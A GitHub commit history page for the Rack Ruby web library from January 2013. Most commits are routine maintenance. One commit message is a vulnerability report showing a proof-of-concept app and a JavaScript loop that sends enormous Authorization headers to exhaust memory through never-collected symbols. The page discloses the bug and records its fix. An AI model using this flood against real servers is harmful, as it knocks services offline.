Skip to content
This repository

Jan 22, 2013

  1. James Tucker

    Switch to RFC 2822 expires

    authored January 21, 2013

Jan 21, 2013

  1. James Tucker

    Fix a long standing misnomer for date formats

    References #414
    authored January 21, 2013
  2. James Tucker

    Use Dir.tmpdir instead of hardcoded /tmp

    Closes #492
    authored January 21, 2013
  3. James Tucker

    Don't modify the middleware hash in Rack::Server

     * Closes #498
    authored January 21, 2013
  4. James Tucker

    Merge pull request #496 from homakov/patch-3

    Remove never called string
    authored January 21, 2013

Jan 14, 2013

  1. Egor Homakov

    Remove never called string

    Previous check `p.empty?` makes sure that p contains at least 1 symbol.
    After `.split('=', 2)` k or v or both will turn into some string which means `k || v` will always return true and `next` will never be called.
    authored January 14, 2013

Jan 13, 2013

  1. James Tucker

    Update to 1.5.0.beta.2

    authored January 13, 2013
  2. James Tucker

    Update README security notes

    authored January 13, 2013
  3. James Tucker

    Update README for release. Add security section.

    authored January 13, 2013
  4. James Tucker

    Rack::Auth::AbstractRequest#scheme returns strings

     * This is a breaking API change, but doesn't appear to be used in public
    authored January 13, 2013
  5. James Tucker

    Squash test warnings

    authored January 13, 2013
  6. James Tucker

    Turn warnings back on for basic test runs

    authored January 13, 2013
  7. James Tucker

    Squash warnings in spec_auth

    authored January 13, 2013
  8. James Tucker

    Reimplement auth scheme fix

     * Add Rack::Auth.add_scheme to enable folks to fix anything that breaks
     * Add common auth schemes, MS ones, AWS ones, etc are missing, as unlikely
     * Checked Rails - they don't use our authorization code
     * Checked Warden - uses rails
     * Checked Omniauth - uses rails
     * Checked doorkeeper - users rails
     * Checked rack-authentication - does it's own thing
     * Checked warden-oauth - doesn't do headers
     * Checked devise - uses rails
     * Checked oauth2-rack - header creation only
     * Checked rack-oauth2-server - does it's own thing
     * Probably missed a bunch, but that'll have to do
    authored January 13, 2013
  9. James Tucker

    Revert "Merge pull request #494 from homakov/patch-2"

    This reverts commit 9b76e4f, reversing
    changes made to bf32f4b.
    authored January 13, 2013
  10. Konstantin Haase

    Merge pull request #494 from homakov/patch-2

    Remove .to_sym in Authorization scheme
    authored January 13, 2013
  11. Egor Homakov

    Remove .to_sym in Authorization scheme

    Hello, `.to_sym` should never be applied on user input. Thus I recommend you to change `scheme` method:
    ```
      def scheme
        @scheme ||= parts.first.downcase.to_sym
      end
    ```
    While we can't send enourmous emount of `Authorization` headers we can make it as long as it's possible. 
    This is PoC. App:
    ```
    cat config.ru 
    require 'rack'
    run lambda{|e|
        auth =  Rack::Auth::Basic::Request.new(e)
        puts auth.basic? if auth.provided?
        puts Symbol.all_symbols.size
        [200, {'Content-Type'=>'text/html'},['IM FINE']]
    }
    ```
    Simple Javascript to DoS it:
    ```
    var base = ["aa", "ab", "ac", "ad", "ae", "af", "ag", "ah", "ai", "aj", "ak", "al", "am", "an", "ao", "ap", "aq", "ar", "as", "at", "au", "av", "aw", "ax", "ay", "az", "ba", "bb", "bc", "bd", "be", "bf", "bg", "bh", "bi", "bj", "bk", "bl", "bm", "bn", "bo", "bp", "bq", "br", "bs", "bt", "bu", "bv", "bw", "bx", "by", "bz", "ca", "cb", "cc", "cd", "ce", "cf", "cg", "ch", "ci", "cj", "ck", "cl", "cm", "cn", "co", "cp", "cq", "cr", "cs", "ct", "cu", "cv", "cw", "cx", "cy", "cz", "da", "db", "dc", "dd", "de", "df", "dg", "dh", "di", "dj", "dk", "dl", "dm", "dn", "do", "dp", "dq", "dr", "ds", "dt", "du", "dv", "dw", "dx", "dy", "dz", "ea", "eb", "ec", "ed", "ee", "ef", "eg", "eh", "ei", "ej", "ek", "el", "em", "en", "eo", "ep", "eq", "er", "es", "et", "eu", "ev", "ew", "ex", "ey", "ez", "fa", "fb", "fc", "fd", "fe", "ff", "fg", "fh", "fi", "fj", "fk", "fl", "fm", "fn", "fo", "fp", "fq", "fr", "fs", "ft", "fu", "fv", "fw", "fx", "fy", "fz", "ga", "gb", "gc", "gd", "ge", "gf", "gg", "gh", "gi", "gj", "gk", "gl", "gm", "gn", "go", "gp", "gq", "gr", "gs", "gt", "gu", "gv", "gw", "gx", "gy", "gz", "ha", "hb", "hc", "hd", "he", "hf", "hg", "hh", "hi", "hj", "hk", "hl", "hm", "hn", "ho", "hp", "hq", "hr", "hs", "ht", "hu", "hv", "hw", "hx", "hy", "hz", "ia", "ib", "ic", "id", "ie", "if", "ig", "ih", "ii", "ij", "ik", "il", "im", "in", "io", "ip", "iq", "ir", "is", "it", "iu", "iv", "iw", "ix", "iy", "iz", "ja", "jb", "jc", "jd", "je", "jf", "jg", "jh", "ji", "jj"];
    var total_sent = 0
    for(var num in base){
    	var x = new XMLHttpRequest;
    	x.open('GET','/'); 
    	str = '';
    	for(i=0;i<2000000;i++){
    	    str+='Ё'+base[num]+i;
    	}
    	x.setRequestHeader('Authorization',str+' lol')
    	x.send();
    	console.log('Total sent: ',total_sent+=str.length);
    }
    ```
    When we run JS every request carries 18888890 letters in a symbol. This 'data' will never be garbarge collectored.
    Should it be fixed?
    authored January 13, 2013

Jan 11, 2013

  1. James Tucker

    Merge branch 'hijack'

    * hijack:
      Hijack SPEC changes after review discussion
      Add straw man for the after-headers hijack
      Straw man for rack.hijack*, connection hijacking!
    authored January 11, 2013
  2. James Tucker

    Hijack SPEC changes after review discussion

    authored January 11, 2013
  3. James Tucker

    Add q-value helpers for Accept headers, etc.

     * Supersedes and closes #443
    authored January 11, 2013
  4. James Tucker

    Introduce Rack::Mime.match?, references #443

    authored January 11, 2013
  5. James Tucker

    Minor code review comments closing #451

     * Adds documentation
     * find is preferred over detect
     * Superseded body objects should be closed
    authored January 11, 2013
  6. James Tucker

    Revert "Set TMPDIR to fix Dir.mktmpdir under jRuby"

    This reverts commit 3b24fa9.
    authored January 11, 2013
  7. James Tucker

    Merge branch 'sendfile_path_mapping' of git://github.com/Casecommons/…

    …rack into sendfile
    
    * 'sendfile_path_mapping' of git://github.com/Casecommons/rack:
      Set TMPDIR to fix Dir.mktmpdir under jRuby
      Additional Ruby 1.8 compaitiblity
      Make spec_sendfile work with Ruby < 1.9
      Initialize Rack::Sendfile with accel mappings
    authored January 11, 2013
  8. James Tucker

    Enable unix sockets with paths as trusted proxies

     * Supersedes and closes #488
    authored January 11, 2013
  9. James Tucker

    Merge pull request #491 from spastorino/allow_build_different_session…

    …_object
    
    Allow subclasses build a different Session Object
    authored January 11, 2013
  10. Santiago Pastorino

    Allow subclasses build a different Session Object

    authored January 11, 2013
  11. James Tucker

    Merge pull request #490 from slivu/master

    Added Reel Web Server and Espresso Framework to supported software list
    authored January 10, 2013
  12. James Tucker

    Merge pull request #489 from spastorino/abstract_id_tiny_patches

    Abstract id tiny patches
    authored January 10, 2013

Jan 10, 2013

  1. Update README.rdoc

    authored January 10, 2013
  2. Santiago Pastorino

    Fix current_session_id docs, id it's retrieved from SessionHash now

    authored January 10, 2013
  3. Santiago Pastorino

    Implement the ID API correctly

    authored January 10, 2013
  4. Santiago Pastorino

    Session is already loaded at this point

    authored January 10, 2013

Jan 09, 2013

  1. Santiago Pastorino

    Rename by to store to match better the purpose of that object

    authored January 09, 2013

Jan 07, 2013

  1. James Tucker

    Merge pull request #487 from carlosantoniodasilva/remove-warnings

    Remove warnings: 'not used variable' and 'shadowing outer variable'
    authored January 07, 2013
Something went wrong with that request. Please try again.